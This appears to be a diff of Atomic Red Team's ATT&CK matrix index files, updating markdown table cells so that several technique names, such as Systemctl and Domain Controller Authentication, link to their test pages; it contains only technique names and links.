+| [Content Injection](../../T1659/T1659.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Content Injection](../../T1659/T1659.md) | [Service Stop](../../T1489/T1489.md) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | [System Services: Systemctl](../../T1569.003/T1569.003.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
@@ -32,7 +32,7 @@
 |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) |  | [Encrypted Channel](../../T1573/T1573.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Inter-Process Communication](../../T1559/T1559.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-|  | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Container CLI/API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -58,7 +58,7 @@
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
-|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |
 |  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
@@ -102,7 +102,7 @@
 |  |  | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
-|  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
+|  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Plist File Modification](../../T1647/T1647.md) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -176,7 +176,7 @@
 |  |  |  |  | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -3,14 +3,14 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
